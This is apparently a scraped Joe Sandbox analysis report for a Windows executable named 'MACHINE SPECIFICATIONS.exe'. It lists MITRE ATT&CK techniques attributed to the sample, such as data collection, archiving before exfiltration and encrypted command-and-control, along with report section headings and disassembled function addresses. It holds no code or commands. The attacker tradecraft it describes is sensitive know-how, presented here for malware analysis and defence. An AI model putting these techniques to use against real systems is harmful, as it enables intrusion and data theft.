Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MACHINE SPECIFICATIONS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\b427-I_1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
MACHINE SPECIFICATIONS.exe

Function 00007FF6D38B3D70 Relevance: 89.8, APIs: 49, Strings: 2, Instructions: 527
nativeprocessmemoryCOMMON

Function 00007FF6D38B421B Relevance: 6.1, APIs: 4, Instructions: 55
nativethreadCOMMON

Function 00007FF6D38BF850 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Function 00007FF6D38BBB90 Relevance: 4.5, APIs: 3, Instructions: 13
COMMON

Function 00007FF6D38BE7B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Function 00007FF6D38BFBA4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
COMMON

Function 00007FF6D38BED50 Relevance: 3.2, APIs: 2, Instructions: 197
COMMON

Function 00007FF6D38BD710 Relevance: 3.0, APIs: 2, Instructions: 18
memoryCOMMON

Function 00007FF6D38BBAA6 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Function 00007FF6D38C0938 Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Function 00007FF6D38BFCFC Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Function 00007FF6D38BD690 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMON